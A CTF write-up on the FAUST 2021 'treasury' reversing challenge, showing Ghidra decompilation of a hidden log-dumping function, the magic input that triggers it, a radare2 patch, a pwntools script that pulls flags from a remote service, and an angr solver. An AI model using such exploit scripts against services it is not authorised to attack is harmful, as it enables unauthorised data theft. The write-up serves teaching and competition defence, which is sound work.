---
title: "FAUST CTF Treasury"
date: 2021-06-30T13:43:50+02:00
tags: ["rev", "2021", "FAUST", "angr"]
showToc: true
description: "Writeup of treasury reversing challange from 2021 faust ctf."
---
# Treasury
## Overview:
- We are given a binary file called [treasury](https://github.com/xtla/writeups/blob/master/2021/faust/treasury/treasury).
- We can also see that under the same path there is a directory called `data`, inside it there are files with random names that contain flags (this can be werified using `grep -rE FAUST_.{32}` inside this directory)

## Running the binary
After running the binary, we recieve the output:
```
	_
 | |
 | |_ _ __ ___  __ _ ___ _   _ _ __ _   _
 | __| '__/ _ \/ _` / __| | | | '__| | | |
 | |_| | |  __/ (_| \__ \ |_| | |  | |_| |
	\__|_|  \___|\__,_|___/\__,_|_|   \__, |
	                                   __/ |
	                                  |___/

Welcome to treasury!
You got so much treasure that you can't
store it all in one vault, but also don't
to worry about keeping track of all the
different ones? Let us worry about
handling those while you focus on getting
more!

Choose an action:
-> add treasure location
-> view treasure locations
-> update treasure location
-> print logs
-> quit
	>
```

We can see that adding treasure creates new file in the `data` directory, and view treasure reads contents of saved file. Also the update part of the program doesn't do anything and print logs function requires a password.

## Exploring binary's code
Next I started exploring binary code in ghidra. First I noticed that code used to determine what option from menu was selected is complicated. I didn't wanted to get in to the details yet. The important thing is the place where a function coresponding to the action choosen from menu is called.
```cpp
(*(code *)(&PTR_FUN_00104dc0)[uVar17])();
```
We can see that a function from a table is called based on value of uVar17.
No let's see what functions are inside this table:

![Here should be a photo with screenshot from ghidra containing contents of this table](./table_contents.png)

That means that when uVar17 is equal:

0. The function responsible for creating new treasure gets called.
1. The function responsible for reading treasure gets called.
2. The function responsible for updating treasure gets called (this function only prints *Sorry, feature not yet implemented!* and exits).
3. The function responsible for printing logs (For some reason ghidra didn't format it as an address).

Here is the code of function at index 3:
```cpp
int iVar1;
char *pcVar2;
uint *puVar3;
uint *puVar4;
undefined *puVar5;
undefined *puVar6;
uint uVar7;
uint uVar8;
long in_FS_OFFSET;
bool bVar9;
uint local_38 [6];
long local_20;

local_20 = *(long *)(in_FS_OFFSET + 0x28);
__printf_chk(1,"Logs are for admins only!\n");
__printf_chk(1,"Password: ");
fflush(stdout);
pcVar2 = fgets((char *)local_38,0x15,stdin);
puVar4 = local_38;
if (pcVar2 == (char *)0x0) {
	iVar1 = feof(stdin);
	if (iVar1 != 0) goto LAB_00101b81;
	FUN_00101bd0("fgets");
	puVar4 = local_38;
}
do {
	puVar3 = puVar4;
	uVar7 = *puVar3 + 0xfefefeff & ~*puVar3;
	uVar8 = uVar7 & 0x80808080;
	puVar4 = puVar3 + 1;
} while (uVar8 == 0);
bVar9 = (uVar7 & 0x8080) == 0;
if (bVar9) {
	uVar8 = uVar8 >> 0x10;
}
if (bVar9) {
	puVar4 = (uint *)((long)puVar3 + 6);
}
puVar5 = (undefined *)((long)puVar4 + (-3 - (ulong)CARRY1((byte)uVar8,(byte)uVar8)));
if ((uint *)puVar5 != local_38) {
	puVar6 = (undefined *)0x0;
	do {
	  puVar6 = (undefined *)(ulong)((int)puVar6 + 1);
	} while (puVar6 < puVar5 + -(long)local_38);
}
__printf_chk(1,"Nice try! :)\n");
__printf_chk(1,"But seriously: Logs are for admins ONLY!!\n");
LAB_00101b81:
if (local_20 != *(long *)(in_FS_OFFSET + 0x28)) {
	                /* WARNING: Subroutine does not return */
	__stack_chk_fail();
}
return;
```
Important thing that I noticed is that this function never attempts to do anything important. It seems that we can't use this function to do anything.

## Attack idea
My basic idea for an attack back then was to read flag file via view function. However seemed impossible as I didn't know the name of a file with the flag. Then I started thinking, why does process of selecting a function to call seem so complicated? A simple switch case should be sufficient. Maybe we could provide input that would somehow cause uVar17 to be greater than 3. Lets explore what is in the function table after the functions used normally by the program.

![Here should be a continuation of contents from the table.](./table_contents2.png)

I noticed that there's an additional function after the function `0x0010260` (On the screenshot it's already renamed as vuln). And here is the code of this function:
```cpp
uint uVar1;
uint uVar2;
FILE *__stream;
char *pcVar3;
void **__ptr;
uint *puVar4;
uint *puVar5;
long lVar6;
int iVar7;
long in_FS_OFFSET;
bool bVar8;
undefined7 local_145;
undefined4 uStack318;
undefined local_13a;
uint local_138 [66];
long local_30;

local_30 = *(long *)(in_FS_OFFSET + 0x28);
local_145 = 0x2f617461642f2e;
uStack318 = 0x676f6c2e;
local_13a = 0;
__stream = fopen((char *)&local_145,"r");
if (__stream == (FILE *)0x0) {
  FUN_00101bd0("fopen");
}
iVar7 = 0;
while (pcVar3 = fgets((char *)local_138,0x100,__stream), puVar5 = local_138, pcVar3 != (char *)0x0
      ) {
  do {
    puVar4 = puVar5;
    uVar1 = *puVar4 + 0xfefefeff & ~*puVar4;
    uVar2 = uVar1 & 0x80808080;
    puVar5 = puVar4 + 1;
  } while (uVar2 == 0);
  bVar8 = (uVar1 & 0x8080) == 0;
  if (bVar8) {
    uVar2 = uVar2 >> 0x10;
  }
  if (bVar8) {
    puVar5 = (uint *)((long)puVar4 + 6);
  }
  lVar6 = (long)puVar5 + ((-3 - (ulong)CARRY1((byte)uVar2,(byte)uVar2)) - (long)local_138);
  if ((&stack0xfffffffffffffec7)[lVar6] == '\n') {
    (&stack0xfffffffffffffec7)[lVar6] = 0;
  }
  if ((lVar6 != 1) &&
     (__ptr = (void **)FUN_00101f60(local_138,uVar2 & 0xffffff00), __ptr != (void **)0x0)) {
    iVar7 = iVar7 + 1;
    __printf_chk(1,"%d: %s - %s\n",iVar7,*__ptr,__ptr[1]);
    free(*__ptr);
    free(__ptr[1]);
    free(__ptr);
  }
}
fclose(__stream);
__printf_chk(1,"That\'s it!\n");
if (local_30 != *(long *)(in_FS_OFFSET + 0x28)) {
                  /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}
return;
```
It's easy to notice that this function reads from file `.log` and displays contents of this file and contests of coresponding treasure line by line.

So now I needed to find an input that causes the binary to call this function. Since I didn't want to do that during ctf, because it seemed difficult I decided to look through pcap file to see if any other team attacked us with some kind of payload. I quickly noticed that some other team sent string **mpteympteymptey** to our service. I tried it, and it worked. I got a list of files and flags.
If you want to know how to find such string on your own go [here](./#solving-the-challange-using-angr).

## Fixing vulnerability
As faust is attack & defence ctf it was also necessary to patch the binary. For that purpose I used radare2. First I created a backup of `treasury` file and then launched radare using `r2 -w ./treasury`. "w" flag stands for writable. Now it was time to decide how to patch the binary. The first thing that came to my mind was to make sure that the index wasn't greater than 3, however this would be difficult and Im a lazy person. An easier solution I thought up is to overwrite instructions at the beginning of vuln function with ret. In order to do that in radare2:

![Screenshot containing instructions necessary to patch binary in radare part 1](./radare2_seek_to_vuln.png)

Here I used radare to find vuln function by address and then printed out a few instructions from the beginning of the function to make sure that I did everything correctly. Now to patch the binary:

![Screenshot containing instructions necessary to patch binary in radare part2](./radare2_seek_to_vuln2.png)

In order to exit radare while saving changes we can just use `q` command.

Now let's check if everything worked correctly.

```
Choose an action:
-> add treasure location
-> view treasure locations
-> update treasure location
-> print logs
-> quit
	> mpteympteymptey

Choose an action:
-> add treasure location
-> view treasure locations
-> update treasure location
-> print logs
-> quit
```
Great! Nothing was printed out.

## Exploiting challange
Given above exploitation is really simple.

```python
#!/bin/env python

from pwn import *
import re

context.log_level = 'error'

server = sys.argv[1]
port = 6789

if len(sys.argv) >= 3:
	port = int(sys.argv[2])

p = remote(server, port)

p.sendline('mpteympteymptey')
data = p.readuntil("That's it!", timeout=1)
flags = re.findall('FAUST_[A-Za-z0-9/+]{32}', data.decode())
print("\n".join(flags))


p.sendline('quit')
```

## Solving the challange using angr
After the competition I thought that it may be possible to get the string that would cause printing out flags using angr. Here is code I came up with.
```python
#!/bin/env python

import angr
import claripy

max_len = 15 # based on the `main` code I assume length of that string is 15
base = 0x00100000 # this is just so I can copy and paste addresses out of ghidra without worrying about base

failure = [0x00102140, 0x00102440, 0x00102600, 0x00101aa0, 0x00101448, 0x00101850]
success = 0x00101cf0

proj = angr.Project("./treasur_backup", auto_load_libs=False, main_opts={'base_addr': base})

flag_chars = [claripy.BVS('flag_%d' % i, 8) for i in range(max_len)]
flag = claripy.Concat( *flag_chars + [claripy.BVV(b'\n')]) # Additional \n for fgets to read the input.

state = proj.factory.full_init_state(
        args=['./treasur_backup'],
        add_options=angr.options.unicorn,
        stdin=flag,
)

simgr = proj.factory.simulation_manager(state)

simgr.explore(find=success, avoid=failure)

if (len(simgr.found) > 0):
    for found in simgr.found:
        print(found.posix.dumps(0))
```
And here is the output that I recieved:
```
(angr) ~/D/c/f/treasury ❯❯❯ time ./angr_sol.py
WARNING | 2021-06-29 18:47:48,135 | angr.simos.simos | stdin is constrained to 16 bytes (has_end=True). If you are only providing the first 16 bytes instead of the entire stdin, please use stdin=SimFileStream(name='stdin', content=your_first_n_bytes, has_end=False).
WARNING | 2021-06-29 18:47:51,237 | angr.storage.memory_mixins.default_filler_mixin | The program is accessing memory or registers with an unspecified value. This could indicate unwanted behavior.
WARNING | 2021-06-29 18:47:51,237 | angr.storage.memory_mixins.default_filler_mixin | angr will cope with this by generating an unconstrained symbolic variable and continuing. You can resolve this by:
WARNING | 2021-06-29 18:47:51,237 | angr.storage.memory_mixins.default_filler_mixin | 1) setting a value to the initial state
WARNING | 2021-06-29 18:47:51,238 | angr.storage.memory_mixins.default_filler_mixin | 2) adding the state option ZERO_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to make unknown regions hold null
WARNING | 2021-06-29 18:47:51,238 | angr.storage.memory_mixins.default_filler_mixin | 3) adding the state option SYMBOL_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to suppress these messages.
WARNING | 2021-06-29 18:47:51,238 | angr.storage.memory_mixins.default_filler_mixin | Filling memory at 0x7fffffffffeff21 with 3 unconstrained bytes referenced from 0x101307 (PLT.__cxa_finalize+0x187 in treasur_backup (0x1307))
b'moxeomoxeomoxeo\n'

________________________________________________________
Executed in  737,69 mins    fish           external
   usr time  736,39 mins  471,00 micros  736,39 mins
   sys time    0,16 mins  104,00 micros    0,16 mins
```
I got a different string that also gives us desired result. However it took over 12 hours for this script to run so it wasn't plausible to solve it that way during ctf. If you want to know how this challange was originaly solved during the ctf [here is the link](https://ubcctf.github.io/2021/06/faustctf-treasury/) to a writeup by Maple Bacon team (they got first blood on this challange).
